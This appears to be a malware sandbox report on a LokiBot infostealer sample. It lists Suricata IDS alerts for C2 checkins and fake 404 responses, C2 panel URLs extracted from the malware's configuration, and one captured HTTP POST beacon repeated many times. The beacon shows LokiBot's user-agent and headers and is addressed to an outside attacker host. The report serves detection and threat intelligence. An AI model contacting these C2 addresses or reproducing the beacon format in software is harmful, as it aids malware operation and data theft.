            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49797 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49800
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49797 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49804 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49793
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49759
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49815 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49789
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49815 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49815 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49810 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49810 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49810 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49747
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49797 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49813 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49815
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49794 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49816 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49816 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49797 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49810 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49797 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49810 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49844
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49840 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49840 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49802 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49802 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49802 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49816 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49830 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49830 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49830 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49816 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49816 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49770
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49830 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49830 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49820 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49820 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49820 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49810
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49840 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49778 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49802 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49830
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: http://solutviewmen.viewdns.net/bdifygidj/five/fre.php
            Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /bdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: solutviewmen.viewdns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1FA537EContent-Length: 149Connection: close
